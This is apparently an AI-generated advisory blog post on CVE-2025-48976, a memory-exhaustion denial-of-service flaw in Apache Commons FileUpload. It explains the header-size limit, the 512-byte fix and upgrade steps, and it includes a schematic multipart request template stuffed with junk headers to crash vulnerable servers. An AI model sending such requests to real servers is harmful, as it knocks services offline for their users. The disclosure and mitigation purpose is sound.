CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2025-48976
7.50.17%

Death by a Thousand Headers: Inside CVE-2025-48976

Alon Barad
Alon Barad
Software Engineer

Jan 23, 2026·4 min read·29 visits

PoC Available

Executive Summary (TL;DR)

Apache Commons FileUpload allowed multipart part headers to be up to 10KB by default. By sending thousands of parts in a single request, an attacker can force the server to allocate massive amounts of memory for headers, leading to an OutOfMemoryError (OOM) and Denial of Service. Fixed in 1.6 and 2.0.0-M4 by dropping the default limit to 512 bytes.

Apache Commons FileUpload, the ubiquitous Java library for handling multipart file uploads, failed to strictly limit the size of headers within individual multipart sections. This allows attackers to exhaust server memory via a 'Cumulative Resource Exhaustion' attack.

The Hook: Plumbing That Leaks

If you are a Java developer, you have used Apache Commons FileUpload. It is the silent workhorse behind multipart/form-data parsing in nearly every major framework—Tomcat, Struts, Spring (historically), and countless enterprise monoliths. It is the plumbing of the Java web world.

But plumbing is only interesting when it explodes. CVE-2025-48976 is exactly that kind of explosion. It isn't a sexy RCE involving deserialization gadget chains; it's a brute-force assault on the logic of how we handle input.

The vulnerability lies in a simple assumption: that a user uploading a file will behave reasonably. The developers assumed that the headers describing a file part (like Content-Disposition or Content-Type) wouldn't be excessively large. They were wrong. And because they were wrong, we can crash the server.

The Flaw: A Matter of Scale

Here is the issue: When you send a multipart request, it's split into 'parts'. Each part has its own set of headers. In affected versions of Commons FileUpload (1.x < 1.6 and 2.x < 2.0.0-M4), the library enforced a limit on these headers, but it was surprisingly generous: 10,240 bytes (10KB) per part.

> [!WARNING] > 10KB doesn't sound like much, right?

Wrong. That is 10KB per part. The library didn't account for an attacker sending a single HTTP POST request containing 10,000 parts.

Do the math: 10,000 parts * 10KB headers = 100 MB of raw string data. Now add the overhead of Java String objects (which are not memory-efficient), the internal buffering in MultipartStream, and the CPU cycles required to trim, parse, and map those headers. You are suddenly looking at gigabytes of heap allocation for a request that takes seconds to generate. This is Cumulative Resource Exhaustion.

The Code: Shrinking the Buffer

The fix is brutal but effective. The maintainers realized that legitimate multipart headers (like Content-Disposition: form-data; name="file"; filename="holiday_photos.jpg") are rarely larger than a tweet. They didn't need a 10KB buffer.

In the patch (Commit b247774...), they introduced a new, stricter configuration partHeaderSizeMax and slashed the default limit drastically.

The Vulnerable Configuration (Implicit):

// Roughly 10KB hardcoded or loosely enforced
public static final int HEADER_PART_SIZE_MAX = 10240;

The Fixed Code (v1.6 / v2.0.0-M4):

// Default slashed to 512 bytes
public static final int DEFAULT_PART_HEADER_SIZE_MAX = 512;
 
// Inside MultipartStream.readHeaders()
if (headersSize > partHeaderSizeMax) {
    throw new FileUploadIOException(
        new SizeLimitExceededException(
            "The header section of a part is too large",
            headersSize,
            partHeaderSizeMax
        )
    );
}

By enforcing a 512-byte limit, they forced the attack cost up significantly. To consume the same amount of memory, an attacker would need to send 20x more parts, likely hitting other limits (like total request size or connection timeouts) before the JVM crashes.

The Exploit: The Loop of Doom

Exploiting this is trivially easy. You don't need Metasploit; you need a few lines of Python. We essentially want to spam the server with valid boundaries, but stuff the headers of each part with junk until we hit just under that 10KB limit.

Here is what the payload structure looks like:

POST /upload HTTP/1.1
Host: vulnerable-app.com
Content-Type: multipart/form-data; boundary=---------------------------123456789
Content-Length: [Huge]
 
---------------------------123456789
Content-Disposition: form-data; name="part1"
X-Junk-Header: AAAAAAAAAAAAAAAAA... [repeat 10,000 times] ...AAAA
 
[small body content]
---------------------------123456789
Content-Disposition: form-data; name="part2"
X-Junk-Header: AAAAAAAAAAAAAAAAA... [repeat 10,000 times] ...AAAA
 
[small body content]
... [Repeat 50,000 times] ...

When the Java application receives this, readHeaders() allocates a buffer for Part 1. Validates it (it's under 10KB, so it passes). Keeps it in memory. Moves to Part 2. Allocates. Validates. Keeps.

Eventually, the Garbage Collector (GC) enters a 'panic mode' (GC Thrashing), trying to free up space that is legally being held by the active request thread. CPU spikes to 100%, and shortly after: java.lang.OutOfMemoryError: Java heap space.

The Fix: Upgrade or Config

This is a mandatory upgrade for anyone exposing file uploads to the internet.

  1. Upgrade: Move to Apache Commons FileUpload 1.6 (for legacy Java 8 projects) or 2.0.0-M4 (Jakarta EE / Modern Java).
  2. Verify Transitive Dependencies: You might not think you are using it, but your dependencies are. Run mvn dependency:tree | grep fileupload.
  3. Tomcat Users: If you are using Tomcat's built-in multipart parsing, update Tomcat. They forked this code and were vulnerable too (fixed in Tomcat 9.0.90+, 10.1.25+, 11.0.0-M21+).

If you absolutely cannot upgrade (why?), you might be able to mitigate this with a WAF rule that blocks requests with an excessive number of Content-Disposition headers or abnormally large Content-Type headers, though this is fragile.

Official Patches

ApacheApache Commons FileUpload 1.6 Release Notes
Apache TomcatApache Tomcat Security Advisory

Fix Analysis (1)

Technical Appendix

CVSS Score
7.5/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Probability
0.17%
Top 61% most exploited

Affected Systems

Apache Commons FileUpload < 1.6Apache Commons FileUpload 2.0.0-M1 to < 2.0.0-M4Apache Tomcat 9.x < 9.0.90Apache Tomcat 10.x < 10.1.25Apache Tomcat 11.x < 11.0.0-M21Applications using Struts 2 (depends on FileUpload)Legacy Spring MVC applications

Affected Versions Detail

Product
Affected Versions
Fixed Version
Apache Commons FileUpload
Apache Software Foundation
< 1.61.6
Apache Commons FileUpload
Apache Software Foundation
2.0.0-M1 - 2.0.0-M32.0.0-M4
AttributeDetail
CWE IDCWE-770
Attack VectorNetwork
CVSS7.5 (High)
ImpactDenial of Service (DoS)
EPSS Score0.0017
Exploit StatusPoC Available

MITRE ATT&CK Mapping

T1499.003Endpoint Denial of Service: Application Exhaustion
Impact
CWE-770
Allocation of Resources with Insufficient Limits

Allocation of Resources Without Limits or Throttling

Known Exploits & Detection

N/AThe vulnerability relies on standard HTTP protocol abuse, no specific binary exploit required.

Vulnerability Timeline

Fix committed to Apache repository
2025-06-05
Official CVE Disclosure
2025-06-16
Linux Distributions publish advisories
2025-07-01

References & Sources

  • [1]Apache Security Announcement
  • [2]CVE-2025-48976 Detail
Related Vulnerabilities
CVE-2023-24998CVE-2016-3092

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.